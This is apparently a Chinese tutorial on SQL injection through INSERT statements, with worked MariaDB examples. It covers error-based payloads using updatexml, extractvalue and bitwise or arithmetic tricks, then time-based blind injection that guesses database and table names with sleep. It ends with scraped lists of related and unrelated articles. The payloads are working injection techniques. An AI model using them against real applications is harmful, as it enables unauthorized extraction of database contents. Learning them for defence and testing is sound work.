insert注入的技巧在于如何在一个字段值内构造闭合。

insert 报错注入

演示案例所用的表:

MariaDB [mysql]> desc test;

+--------+----------+------+-----+---------+-------+

| Field  | Type     | Null | Key | Default | Extra |

+--------+----------+------+-----+---------+-------+

| id     | int(10)  | YES  |     | NULL    |       |

| uname  | char(10) | YES  |     | NULL    |       |

| passwd | char(10) | YES  |     | NULL    |       |

+--------+----------+------+-----+---------+-------+

0x01: insert数字型报错注入

MariaDB [mysql]> insert into test values(1 and updatexml(1,concat(0x7e,database(),0x7e),1),'2','3');

ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

0x02: insert字符型报错注入

提示:字符型的关键在于如何在一个字段值内构造闭合。
MariaDB [mysql]> insert into test values(1,'2' and updatexml(1,concat(0x7e,database(),0x7e),1)  and '','3');

ERROR 1105 (HY000): XPATH syntax error: '~mysql~'

0x03: 用extractvalue代替updatexml

MariaDB [mysql]> insert into test values(1,'2' and extractvalue(1,concat(0x7e,database()))  and '','3');

ERROR 1105 (HY000): XPATH syntax error: '~mysql'

0x04: 使用按位运算符制造insert数字型报错注入

产生报错是因为1和(select database())的值做按位运算,但是字符不能做按位运算,所以会报错提示哪个值类型错误。"& , | , ^"运算同理。

按位运算详情请参考此链接

MariaDB [mysql]> insert into test values(1 ^ (select database()),'2','3');

ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

MariaDB [mysql]> insert into test values(1 | (select database()),'2','3');

ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

MariaDB [mysql]> insert into test values(1 & (select database()),'2','3');

ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

0x05: 使用按位运算符制造insert字符型报错注入

insert into test values(1,'1' & (select database()) & '','3');

ERROR 1292 (22007): Truncated incorrect INTEGER value: 'mysql'

0x06: 使用算术运算符制造insert报错注入(+,-,%,/),灵活运用按位运算符,逻辑运算符,算术运算符。

MariaDB [mysql]> insert into test values(1,'1' + (select database()) & '','3');

ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' - (select database()) and '','3');

ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' / (select database()) or '','3');

ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) & '','3');

ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) | '','3');

ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

MariaDB [mysql]> insert into test values(1,'1' % (select database()) / '','3');

ERROR 1292 (22007): Truncated incorrect DOUBLE value: 'mysql'

insert延时盲注

在学习延时盲注之前你需要具备sql(sleep(),if(),substr(),ascii(),case when)的用法。

0x07: 一个简单示例

原始正常语句:

MariaDB [mysql]> insert into test values(1,('2'),'3');

Query OK, 1 row affected (0.005 sec)

MariaDB [mysql]> insert into test values(1,('1') and sleep(3) and (''),'3');

Query OK, 1 row affected, 1 warning (3.002 sec)

0x08: 猜测当前所在库的名称长度,如果数据库长度等于5则延时3秒输出内容。

MariaDB [mysql]> insert into test values(1,('1') and sleep(if((select length(database()))=5,3,0)) and (''),'3');

Query OK, 1 row affected, 1 warning (3.007 sec)

0x09: 猜测当前库的第一个表名的第一个字符的ascii码。慢慢去理解,慢就是快。

实际的值:

MariaDB [mysql]> select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));

+---------------------------------------------------------------------------------------------------------------+

| ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) |

+---------------------------------------------------------------------------------------------------------------+

|                                                                                                           112 |

+---------------------------------------------------------------------------------------------------------------+

1 row in set (0.000 sec)

insert盲注如下所示:

MariaDB [mysql]> insert into test values(1,('1') and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=112,3,0)) and (''),'3');

Query OK, 1 row affected, 1 warning (3.005 sec)

0x10: 用case then代替if():

MariaDB [mysql]> insert into test values(1,('2') and case when (select length(database())) = 5 then sleep(2) else 0 end and (''),'3');

Query OK, 1 row affected, 1 warning (2.002 sec)

MariaDB [mysql]> insert into test values(1,('2') and case when ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 112 then sleep(2) else 0 end and (''),'3');

Query OK, 1 row affected, 1 warning (2.004 sec)
掌握以上内容insert报错注入与盲注就基本差不多了

[sql 注入] insert 报错注入与延时盲注的更多相关文章

  1. sql注入之报错注入and boolean注入

    1.sql注入之报错注入 正常传参,返回页面正常: 加入'  返回页面报错,出现"zhangsan"' 报错注入使用的函数 在这里我们使用 select updatexml(1,c ...

  2. 实验吧——加了料的报错注入(exp报错注入)

    题目地址:http://ctf5.shiyanbar.com/web/baocuo/index.php 先查看页面源码得到提示知道了后台执行的sql语句,很常规的查询 测试了一个报错函数发现如下回显, ...

  3. SQL注入之报错注入常见函数

  4. 渗透之路基础 -- SQL进阶(盲注和报错注入)

    SQL注入之盲注 实战过程中,大多情况下很少会有回显,这个时候就要去使用盲注技术 盲注,Blind SQL Injection,听这名字就感觉整个过程就是一个盲目的过程 当注入时,没有任何提示的时候, ...

  5. SQL注入--盲注及报错注入

    盲注查询 盲注其实就是没有回显,不能直观地得到结果来调整注入数据,只能通过其他方式来得到是否注入成功,主要是利用了一些数据库内置函数来达到的 布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根 ...

  6. SQL注入之MySQL报错注入整理

    看大佬们的文章看得我虎躯一震,精神抖擞,于是心血来潮,整理一下MySQL报错注入常见的手段和方法,再举几个例子 <代码审计:企业级Web代码安全架构>一书中介绍过报错注入十大方法,依次是: ...

  7. mutillidae之注册页面的Insert型报错注入

    http://127.0.0.1/mutillidae/index.php?page=register.php 1.注册一个用户试一试,发现页面只提示用户注册成功信息,并五其它可回显信息,果断尝试盲注 ...

  8. CTF-sql-group by报错注入

    本文章主要涉及group by报错注入的原理讲解,如有错误,望指出.(附有目录,如需查看请点右下角) 一.下图为本次文章所使用到 user表,该表所在的数据库为 test 二.首先介绍一下本文章所使用 ...

  9. SQL注入——报错注入

    0x00 背景 SQL注入长期位于OWASP TOP10 榜首,对Web 安全有着很大的影响,黑客们往往在注入过程中根据错误回显进行判断,但是现在非常多的Web程序没有正常的错误回显,这样就需要我们利 ...

随机推荐

  1. .net core autofac asyncinterceptor 异步拦截器帮助包

    autofac使用拦截器实现AOP,是基于Castle.Core的.然而Castle.Core并未提供原生异步支持.所以需要使用帮助类实现,这在autofac官方文档的已知问题中有详细说明: http ...

  2. java如何实现一个Future

    实现Futrue接口 public class MsgFuture<V> implements java.util.concurrent.Future<V> { ... ... ...

  3. vue-cli3生产环境和开发环境路径的替换

    在根目录下创建两个文件,这样的好处在于不用手动去书写判断环境替换路径代码 .env.development(开发) .env.production(生产) 内容: 必须是VUE_APP前缀开头,这样w ...

  4. spring与缓存注解,以及encache缓存使用

    随着时间的积累,应用的使用用户不断增加,数据规模也越来越大,往往数据库查询操作会成为影响用户使用体验的瓶颈,此时使用缓存往往是解决这一问题非常好的手段之一.Spring 3开始提供了强大的基于注解的缓 ...

  5. oracle ql/sql 相关语法解析

    这篇文章主要介绍了Oracle中游标Cursor基本用法详解,还是比较全面的,具有一定参考价值,需要的朋友可以了解下.   查询 SELECT语句用于从数据库中查询数据,当在PL/SQL中使用SELE ...

  6. 【源码】spring循环引用

    spring在单例,非构造方法注入的情况下允许循环依赖 1.循环依赖 a引用b,b引用a.a创建的时候需要b,但是b没有创建,需要先去创建b,b创建的时候又没有a,这就出现的循环依赖的问题 2.为什么 ...

  7. CSS动画之转换模块

    2D转换模块:注意点:1.可以类似于过渡模块一样简写,但是这里不是用逗号隔开而是用空格 2.2D的转换模块会修改元素的坐标系,所以旋转之后的平移就不是水平平移 格式:旋转:transform: rot ...

  8. Go语言反射(reflect)及应用

    Go语言反射(reflect)及应用 基本原理及应用场景 在编译时不知道类型的情况下,可更新变量.在运行时查看值.调用方法以及直接对它们的布局进行操作,这种机制被称为反射. 具体的应用场景大概如下: ...

  9. 微信小程序获取请求数据

    <%@ WebHandler Language="C#" Class="CodeTest" %> using System; using Syste ...

  10. leetcode134:3sum

    题目描述 给出一个有n个元素的数组S,S中是否有元素a,b,c满足a+b+c=0?找出数组S中所有满足条件的三元组. 注意: 三元组(a.b.c)中的元素必须按非降序排列.(即a≤b≤c) 解集中不能 ...